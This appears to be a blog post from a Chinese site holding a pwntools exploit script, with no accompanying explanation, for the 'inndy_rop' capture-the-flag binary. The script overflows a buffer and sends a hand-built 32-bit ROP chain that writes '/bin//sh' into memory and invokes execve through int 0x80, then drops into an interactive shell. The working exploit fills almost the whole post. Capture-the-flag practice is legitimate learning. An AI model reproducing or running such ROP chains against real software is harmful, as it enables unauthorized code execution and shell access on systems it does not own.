1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47
| from pwn import* from struct import pack from LibcSearcher import *
r=process("./inndy_rop") context.log_level="debug" p=b'a'*(0xc+4) p += pack('<I', 0x0806ecda) p += pack('<I', 0x080ea060) p += pack('<I', 0x080b8016) p += b'/bin' p += pack('<I', 0x0805466b) p += pack('<I', 0x0806ecda) p += pack('<I', 0x080ea064) p += pack('<I', 0x080b8016) p += b'//sh' p += pack('<I', 0x0805466b) p += pack('<I', 0x0806ecda) p += pack('<I', 0x080ea068) p += pack('<I', 0x080492d3) p += pack('<I', 0x0805466b) p += pack('<I', 0x080481c9) p += pack('<I', 0x080ea060) p += pack('<I', 0x080de769) p += pack('<I', 0x080ea068) p += pack('<I', 0x0806ecda) p += pack('<I', 0x080ea068) p += pack('<I', 0x080492d3) p += pack('<I', 0x0807a66f) p += pack('<I', 0x0807a66f) p += pack('<I', 0x0807a66f) p += pack('<I', 0x0807a66f) p += pack('<I', 0x0807a66f) p += pack('<I', 0x0807a66f) p += pack('<I', 0x0807a66f) p += pack('<I', 0x0807a66f) p += pack('<I', 0x0807a66f) p += pack('<I', 0x0807a66f) p += pack('<I', 0x0807a66f) p += pack('<I', 0x0806c943)
r.sendline(p)
r.interactive()
|
评论区
欢迎你留下宝贵的意见,昵称输入QQ号会显示QQ头像哦~